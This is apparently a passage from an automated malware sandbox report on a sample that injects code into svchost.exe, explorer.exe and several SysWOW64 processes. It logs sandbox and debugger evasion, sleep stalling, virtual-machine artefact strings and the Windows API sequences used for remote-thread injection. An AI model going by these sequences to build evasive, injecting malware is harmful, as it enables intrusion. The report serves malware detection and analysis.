                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_10015AF63_2_10015AF6
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_1000FBB23_2_1000FBB2
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_1000FD2D3_2_1000FD2D
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: 6_2_100061466_2_10006146
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: 6_2_100063766_2_10006376
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: 6_2_1000E9716_2_1000E971
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: 6_2_10015AF66_2_10015AF6
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: 6_2_1000FBB26_2_1000FBB2
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: 6_2_1000FD2D6_2_1000FD2D
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: 8_2_100061468_2_10006146
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: 8_2_100063768_2_10006376
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: 8_2_1000E9718_2_1000E971
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: 8_2_10015AF68_2_10015AF6
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: 8_2_1000FBB28_2_1000FBB2
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: 8_2_1000FD2D8_2_1000FD2D
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: 9_2_100061469_2_10006146
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: 9_2_100063769_2_10006376
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: 9_2_1000E9719_2_1000E971
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: 9_2_10015AF69_2_10015AF6
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: 9_2_1000FBB29_2_1000FBB2
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: 9_2_1000FD2D9_2_1000FD2D
                      Source: C:\Windows\SysWOW64\raserver.exeCode function: 10_2_1000614610_2_10006146
                      Source: C:\Windows\SysWOW64\raserver.exeCode function: 10_2_1000637610_2_10006376
                      Source: C:\Windows\SysWOW64\raserver.exeCode function: 10_2_1000E97110_2_1000E971
                      Source: C:\Windows\SysWOW64\raserver.exeCode function: 10_2_10015AF610_2_10015AF6
                      Source: C:\Windows\SysWOW64\raserver.exeCode function: 10_2_1000FBB210_2_1000FBB2
                      Source: C:\Windows\SysWOW64\raserver.exeCode function: 10_2_1000FD2D10_2_1000FD2D
                      Source: C:\Windows\SysWOW64\fontview.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_6-31273
                      Source: C:\Windows\SysWOW64\resmon.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleep
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleep
                      Source: C:\Windows\SysWOW64\raserver.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleep
                      Source: C:\Windows\SysWOW64\control.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_3-31286
                      Source: C:\Windows\SysWOW64\control.exeStalling execution: Execution stalls by calling Sleepgraph_3-32280
                      Source: C:\Windows\SysWOW64\fontview.exeStalling execution: Execution stalls by calling Sleepgraph_6-32278
                      Source: C:\Windows\SysWOW64\resmon.exeStalling execution: Execution stalls by calling Sleep
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeStalling execution: Execution stalls by calling Sleep
                      Source: C:\Windows\SysWOW64\control.exeCode function: GetAdaptersInfo,GetAdaptersInfo,GlobalAlloc,GetAdaptersInfo,inet_addr,inet_addr,SendARP,GlobalFree,3_2_100021EB
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: GetAdaptersInfo,GetAdaptersInfo,GlobalAlloc,GetAdaptersInfo,inet_addr,inet_addr,SendARP,GlobalFree,6_2_100021EB
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: GetAdaptersInfo,GetAdaptersInfo,GlobalAlloc,GetAdaptersInfo,inet_addr,inet_addr,SendARP,GlobalFree,8_2_100021EB
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: GetAdaptersInfo,GetAdaptersInfo,GlobalAlloc,GetAdaptersInfo,inet_addr,inet_addr,SendARP,GlobalFree,9_2_100021EB
                      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 886Jump to behavior
                      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 868Jump to behavior
                      Source: C:\Windows\SysWOW64\control.exeWindow / User API: threadDelayed 1321Jump to behavior
                      Source: C:\Windows\SysWOW64\control.exeWindow / User API: threadDelayed 1185Jump to behavior
                      Source: C:\Windows\SysWOW64\fontview.exeWindow / User API: threadDelayed 1198Jump to behavior
                      Source: C:\Windows\SysWOW64\fontview.exeWindow / User API: threadDelayed 1227Jump to behavior
                      Source: C:\Windows\SysWOW64\resmon.exeWindow / User API: threadDelayed 1149Jump to behavior
                      Source: C:\Windows\SysWOW64\resmon.exeWindow / User API: threadDelayed 1197Jump to behavior
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeWindow / User API: threadDelayed 1292Jump to behavior
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeWindow / User API: threadDelayed 1242Jump to behavior
                      Source: C:\Windows\SysWOW64\raserver.exeWindow / User API: threadDelayed 692Jump to behavior
                      Source: C:\Windows\SysWOW64\raserver.exeWindow / User API: threadDelayed 721Jump to behavior
                      Source: C:\Windows\SysWOW64\fontview.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_6-31891
                      Source: C:\Windows\SysWOW64\raserver.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
                      Source: C:\Windows\SysWOW64\control.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_3-31785
                      Source: C:\Windows\SysWOW64\resmon.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
                      Source: C:\Windows\SysWOW64\control.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_3-32167
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                      Source: C:\Windows\SysWOW64\fontview.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_6-32334
                      Source: C:\Windows\SysWOW64\resmon.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                      Source: C:\Windows\System32\svchost.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_1-8004
                      Source: C:\Users\user\Desktop\1731043030539.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-455
                      Source: C:\Windows\SysWOW64\raserver.exeAPI coverage: 6.5 %
                      Source: C:\Windows\System32\svchost.exe TID: 2520Thread sleep count: 116 > 30Jump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 2520Thread sleep time: -116000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\control.exe TID: 5568Thread sleep count: 1321 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\control.exe TID: 6688Thread sleep count: 1185 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\control.exe TID: 1248Thread sleep count: 73 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\fontview.exe TID: 6092Thread sleep count: 1198 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\fontview.exe TID: 4012Thread sleep count: 1227 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\fontview.exe TID: 2072Thread sleep count: 62 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\resmon.exe TID: 3628Thread sleep count: 1149 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\resmon.exe TID: 3040Thread sleep count: 1197 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\resmon.exe TID: 6368Thread sleep count: 67 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe TID: 6772Thread sleep count: 1292 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe TID: 5840Thread sleep count: 1242 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe TID: 4276Thread sleep count: 69 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\raserver.exe TID: 7132Thread sleep count: 692 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\raserver.exe TID: 5752Thread sleep count: 721 > 30Jump to behavior
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\explorer.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\fontview.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\resmon.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeCode function: 1_2_00000001800024D0 FindFirstFileA,_time64,FindNextFileA,wsprintfA,FindNextFileA,1_2_00000001800024D0
                      Source: explorer.exe, 00000002.00000000.2044913659.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
                      Source: explorer.exe, 00000002.00000002.3297386884.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
                      Source: explorer.exe, 00000002.00000000.2044913659.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3299498733.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094503764.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0r
                      Source: explorer.exe, 00000002.00000000.2044913659.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                      Source: explorer.exe, 00000002.00000000.2044913659.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
                      Source: explorer.exe, 00000002.00000000.2044913659.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000002.00000002.3299498733.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
                      Source: explorer.exe, 00000002.00000000.2038249716.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
                      Source: explorer.exe, 00000002.00000000.2044913659.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                      Source: explorer.exe, 00000002.00000000.2038249716.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 d9 2e dc 89 72 dX
                      Source: explorer.exe, 00000002.00000000.2035928494.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
                      Source: explorer.exe, 00000002.00000002.3297386884.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
                      Source: explorer.exe, 00000002.00000003.3094503764.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2044913659.0000000009B2C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: control.exe, 00000003.00000002.3293163076.0000000002E79000.00000004.00000020.00020000.00000000.sdmp, BackgroundTransferHost.exe, 00000009.00000002.3293745116.0000000002A7B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllf
                      Source: explorer.exe, 00000002.00000000.2038249716.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
                      Source: explorer.exe, 00000002.00000000.2038249716.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware,p
                      Source: explorer.exe, 00000002.00000000.2044913659.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
                      Source: explorer.exe, 00000002.00000000.2044913659.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
                      Source: fontview.exe, 00000006.00000002.3293216939.0000000000B8A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: explorer.exe, 00000002.00000000.2035928494.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                      Source: explorer.exe, 00000002.00000002.3299498733.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: resmon.exe, 00000008.00000002.3293228985.0000000002859000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 0000000A.00000002.3293273554.0000000002ED8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: explorer.exe, 00000002.00000000.2039818389.000000000769A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_1-8005
                      Source: C:\Windows\SysWOW64\control.exeAPI call chain: ExitProcess graph end nodegraph_3-30896
                      Source: C:\Windows\SysWOW64\fontview.exeAPI call chain: ExitProcess graph end nodegraph_6-31235
                      Source: C:\Windows\SysWOW64\resmon.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\SysWOW64\raserver.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\Desktop\1731043030539.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Source: C:\Windows\SysWOW64\control.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_3-30289
                      Source: C:\Windows\SysWOW64\fontview.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_6-30289
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep
                      Source: C:\Windows\SysWOW64\resmon.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep
                      Source: C:\Windows\System32\svchost.exeCode function: 1_2_0000000180011C28 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_0000000180011C28
                      Source: C:\Windows\System32\svchost.exeCode function: 1_2_0000000180011C28 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_0000000180011C28
                      Source: C:\Windows\System32\svchost.exeCode function: 1_2_0000000180011C28 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_0000000180011C28
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_1001B58B mov eax, dword ptr fs:[00000030h]3_2_1001B58B
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: 6_2_1001B58B mov eax, dword ptr fs:[00000030h]6_2_1001B58B
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: 8_2_1001B58B mov eax, dword ptr fs:[00000030h]8_2_1001B58B
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: 9_2_1001B58B mov eax, dword ptr fs:[00000030h]9_2_1001B58B
                      Source: C:\Windows\SysWOW64\raserver.exeCode function: 10_2_1001B58B mov eax, dword ptr fs:[00000030h]10_2_1001B58B
                      Source: C:\Windows\System32\svchost.exeCode function: 1_2_00000001800139A0 _lseeki64_nolock,_lseeki64_nolock,GetProcessHeap,HeapAlloc,_errno,_errno,_setmode_nolock,_errno,_setmode_nolock,GetProcessHeap,HeapFree,_lseeki64_nolock,SetEndOfFile,_errno,GetLastError,_lseeki64_nolock,1_2_00000001800139A0
                      Source: C:\Users\user\Desktop\1731043030539.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\svchost.exeCode function: 1_2_000000018000D10C SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_000000018000D10C
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_1003967E SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_1003967E
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: 6_2_1003967E SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_1003967E
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: 8_2_1003967E SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_1003967E
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: 9_2_1003967E SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_1003967E
                      Source: C:\Windows\SysWOW64\raserver.exeCode function: 10_2_1003967E SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_1003967E

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\Desktop\1731043030539.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1AD89460000 protect: page read and writeJump to behavior
                      Source: C:\Users\user\Desktop\1731043030539.exeMemory allocated: C:\Windows\explorer.exe base: 1220000 protect: page read and writeJump to behavior
                      Source: C:\Users\user\Desktop\1731043030539.exeMemory protected: C:\Windows\explorer.exe base: 1220000 protect: page execute readJump to behavior
                      Source: C:\Users\user\Desktop\1731043030539.exeCode function: 0_2_00007FF6E5342318 OpenProcess,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,WaitForSingleObject,CloseHandle,VirtualFreeEx,wsprintfW,Wow64GetThreadContext,Wow64SetThreadContext,GetThreadContext,SetThreadContext,ResumeThread,WaitForSingleObject,0_2_00007FF6E5342318
                      Source: C:\Users\user\Desktop\1731043030539.exeCode function: 0_2_00007FF6E5342700 lstrcpyW,OpenProcess,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,CloseHandle,CloseHandle,0_2_00007FF6E5342700
                      Source: C:\Users\user\Desktop\1731043030539.exeCode function: 0_2_00007FF6E5342318 OpenProcess,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,WaitForSingleObject,CloseHandle,VirtualFreeEx,wsprintfW,Wow64GetThreadContext,Wow64SetThreadContext,GetThreadContext,SetThreadContext,ResumeThread,WaitForSingleObject,0_2_00007FF6E5342318
                      Source: C:\Windows\System32\svchost.exeCode function: 1_2_00000001800067AC VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,WaitForSingleObject,CloseHandle,VirtualFreeEx,OutputDebugStringW,Wow64GetThreadContext,Wow64SetThreadContext,GetThreadContext,SetThreadContext,ResumeThread,WaitForSingleObject,1_2_00000001800067AC
                      Source: C:\Users\user\Desktop\1731043030539.exeThread created: C:\Windows\explorer.exe EIP: 1220208Jump to behavior
                      Source: C:\Users\user\Desktop\1731043030539.exeMemory written: C:\Windows\System32\svchost.exe base: 1AD89460818 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\SysWOW64\control.exe base: B107F8 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\SysWOW64\fontview.exe base: 8207F8 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\SysWOW64\resmon.exe base: 23007F8 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\SysWOW64\BackgroundTransferHost.exe base: 6B07F8 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\SysWOW64\raserver.exe base: 2AC07F8 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\1731043030539.exeMemory written: PID: 1028 base: 1220000 value: 43Jump to behavior
                      Source: C:\Users\user\Desktop\1731043030539.exeThread register set: target process: 6568Jump to behavior
                      Source: C:\Users\user\Desktop\1731043030539.exeThread register set: 6568 210FEB90E70Jump to behavior
                      Source: C:\Users\user\Desktop\1731043030539.exeMemory written: C:\Windows\System32\svchost.exe base: 1AD89460000Jump to behavior
                      Source: C:\Users\user\Desktop\1731043030539.exeMemory written: C:\Windows\System32\svchost.exe base: 1AD894607F0Jump to behavior
                      Source: C:\Users\user\Desktop\1731043030539.exeMemory written: C:\Windows\System32\svchost.exe base: 1AD89460818Jump to behavior
                      Source: C:\Users\user\Desktop\1731043030539.exeMemory written: C:\Windows\System32\svchost.exe base: 1AD89565818Jump to behavior
                      Source: C:\Users\user\Desktop\1731043030539.exeMemory written: C:\Windows\explorer.exe base: 1220000Jump to behavior
                      Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\SysWOW64\control.exe base: B10000Jump to behavior
                      Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\SysWOW64\control.exe base: B107D0Jump to behavior
                      Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\SysWOW64\control.exe base: B107F8Jump to behavior
                      Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\SysWOW64\control.exe base: BDEDF8Jump to behavior
                      Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\SysWOW64\fontview.exe base: 820000Jump to behavior
                      Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\SysWOW64\fontview.exe base: 8207D0Jump to behavior
                      Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\SysWOW64\fontview.exe base: 8207F8Jump to behavior
                      Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\SysWOW64\fontview.exe base: 8EEDF8Jump to behavior
                      Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\SysWOW64\resmon.exe base: 2300000Jump to behavior
                      Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\SysWOW64\resmon.exe base: 23007D0Jump to behavior
                      Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\SysWOW64\resmon.exe base: 23007F8Jump to behavior
                      Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\SysWOW64\resmon.exe base: 23CEDF8Jump to behavior
                      Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\SysWOW64\BackgroundTransferHost.exe base: 6B0000Jump to behavior
                      Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\SysWOW64\BackgroundTransferHost.exe base: 6B07D0Jump to behavior
                      Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\SysWOW64\BackgroundTransferHost.exe base: 6B07F8Jump to behavior
                      Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\SysWOW64\BackgroundTransferHost.exe base: 77EDF8Jump to behavior
                      Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\SysWOW64\raserver.exe base: 2AC0000Jump to behavior
                      Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\SysWOW64\raserver.exe base: 2AC07D0Jump to behavior
                      Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\SysWOW64\raserver.exe base: 2AC07F8Jump to behavior
                      Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\SysWOW64\raserver.exe base: 2B8EDF8Jump to behavior
                      Source: C:\Users\user\Desktop\1731043030539.exeCode function: GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,wsprintfW,lstrlenW,OpenProcess,CloseHandle,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,OpenProcess,InitializeProcThreadAttributeList,GlobalAlloc,InitializeProcThreadAttributeList,UpdateProcThreadAttribute,lstrcpyW,CreateProcessW,CloseHandle,CloseHandle,CloseHandle,DeleteProcThreadAttributeList,GlobalFree,CloseHandle,wsprintfW,wsprintfW,OpenProcess,CloseHandle,OpenProcess,CloseHandle,wsprintfW,wsprintfW,OpenProcess,OpenProcess,CloseHandle,wsprintfW,wsprintfW,PathFindFileNameW,InitializeProcThreadAttributeList,GlobalAlloc,InitializeProcThreadAttributeList,UpdateProcThreadAttribute,lstrcpyW,CreateProcessW,CloseHandle,CloseHandle,CloseHandle,DeleteProcThreadAttributeList,GlobalFree,CloseHandle,wsprintfW,wsprintfW,OpenProcess,CloseHandle,wsprintfW, C:\Windows\System32\svchost.exe -k LocalServiceNetwork -p0_2_00007FF6E53411CB
